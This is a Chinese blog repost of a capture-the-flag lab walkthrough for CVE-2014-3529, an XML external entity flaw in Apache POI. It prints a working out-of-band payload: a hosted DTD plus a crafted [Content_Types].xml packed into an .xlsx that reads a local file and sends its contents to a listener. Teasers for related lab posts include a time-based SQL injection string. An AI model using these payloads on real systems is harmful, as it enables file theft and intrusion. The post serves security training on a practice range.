[春秋云镜]CVE-2014-3529

10月前作者：web-春天11 分类：Toy博客阅读(31) 违法举报

这篇具有很好参考价值的文章主要介绍了[春秋云镜]CVE-2014-3529。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

靶场介绍

Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件，该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。

春秋云镜开启靶场：

http://eci-2ze9wvzaypj11h8emteu.cloudeci1.ichunqiu.com:8080/

一：使用python开启一个web服务

python -m http.server 80

[春秋云镜]CVE-2014-3529

二：在web服务器目录下放一个xxe.dtd

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1/%file;'>">
%all;

三：制作包含payload的Excel

[Content_Types].xml

<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> 
<!ENTITY % dtd SYSTEM "http://127.0.0.1/xxe.dtd">
%dtd; %send;]>

[春秋云镜]CVE-2014-3529

然后需要压缩[Content_Types].xml为zip文件

[春秋云镜]CVE-2014-3529

[Content_Types].zip修改为xxe.xlsx

[春秋云镜]CVE-2014-3529

靶场测试

[春秋云镜]CVE-2014-3529

上传xxe.xlsx文件

[春秋云镜]CVE-2014-3529

复制下来进行解析测试

[春秋云镜]CVE-2014-3529

回到web服务器可以查看到访问记录

即可成功获取flag

[春秋云镜]CVE-2014-3529 文章来源地址https://www.toymoban.com/news/detail-417843.html

到了这里，关于[春秋云镜]CVE-2014-3529的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

[春秋云镜]CVE-2020-19960,CVE-2020-19961

zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag) 春秋云镜开启靶场： http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/ 后台 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php 账号admin 密码admin 登录进来找上传点 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1

2024年02月14日
浏览(35)
1、[春秋云镜]CVE-2022-32991

靶场提示：该CMS的welcome.php中存在SQL注入攻击。 NVD关于漏洞的描述：注入点不仅在 eid 处！！！（1）既然NVD说漏洞在welcome.php处，且参数为 eid ，先注册账号。（2）登录账号后，发现页面就是welcome.php。（3）随便点一个 action ，点点 submit ，会发现url中的n参数

2024年02月11日
浏览(36)
春秋云镜cve-2022-32991wp

首先看靶标介绍：该CMS的welcome.php中存在SQL注入攻击访问此场景，为登录界面，可注册，注册并登陆后找可能存在sql注入的参数，尝试在各个参数后若加一个单引号报错，加两个单引号不报错，说明此参数可能存在sql注入，经过尝试在 http://xxx.ichunqiu.com/welcome.php?q=quizstep=2ei

2024年02月12日
浏览(59)
[春秋云镜] CVE-2022-28060 详细讲解

目录前期准备工具+环境渗透测试靶场提示靶场测试 burpsuite SQLmap Victor CMS v1.0 /includes/login.php 存在sql注入 1.打开开启的靶场，右边发现一个登入界面 2.任意输入账号密码，打开burpsuite进行抓包 3.将抓到的包放入一个文件，使用SQLmap去爆破 4.爆破出来之后，选择y生成文件，

2024年02月13日
浏览(38)
春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

靶标介绍： Subrion CMS 4.2.1 存在文件上传漏洞进入题目： admin/admin 点击设置：后台管理主页：上传页面：上传目录： /panel/uploads/ 查看上传位置：上传位置： uploads/system.pht flag{24505f02-d430-4d3b-905e-17349e09c34c}

2024年02月11日
浏览(33)
[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

访问题目提示的login.php，登录框登录抓包，保存为2.txt，sqlmap跑起来时间3分钟左右，自己手动输入Y后回车，跑完根据提示打开文件夹，拿到flag 动下小手来个赞吧~~~ 和上面同类型，点击首页上面banner的admin，未授权直接进入，找到如图的注入点抓包，保存为3.txt，s

2024年02月11日
浏览(54)
春秋云镜靶机

Subrion CMS 4.2.1 存在文件上传漏洞 flag{88ac8da5-e712-40fc-85c9-df7f8fb6a3e5} CuppaCMS是一套内容管理系统（CMS）。 CuppaCMS 2019-11-12之前版本存在安全漏洞，攻击者可利用该漏洞在图像扩展内上传恶意文件，通过使用文件管理器提供的重命名函数的自定义请求，可以将图像扩展修改为PHP，从

2024年02月15日
浏览(40)
【内网渗透】春秋云镜Intitle WP

第一次正式接触内网渗透的东西，写的很新手，也适合新手观看，有问题可以私信或评论，接下来会持续更新拿到地址先nmap扫端口没什么发现，直接访问80端口，看到图标知道是thinkphp 用thinkphp漏洞集成工具测试，发现有rce的漏洞一键getshell,用蚁剑连上去 whoami，发现权限比

2024年02月01日
浏览(39)
春秋云镜-内网极限挑战赛-Exchange

看到奖品还有证书，还涉及oscp方面的东西，过来打打感谢TryHackMe Exchange 是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中

2023年04月19日
浏览(40)
春秋云境：CVE-2022-28060

文章合集：春秋云境系列靶场记录（合集）漏洞介绍 Victor CMS v1.0 /includes/login.php 存在sql注入解题步骤访问URL，在登录过程中抓包：探测存在SQL注入： 1\\\'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+\\\'1\\\'=\\\' 使用Sqlmap获取flag，通过–sql-shell再传入load_file进行文件读取：文章合集：春秋云境

2024年02月12日
浏览(68)